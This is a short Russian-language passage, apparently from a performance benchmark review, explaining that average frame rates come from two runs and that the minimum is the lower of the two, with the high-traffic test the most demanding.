Для получения средних результатов мы просто усреднили две отдельные частоты кадров. Минимальное число представляет собой меньшее из двух прогонов (без исключения тест с высоким трафиком был наиболее утомительным).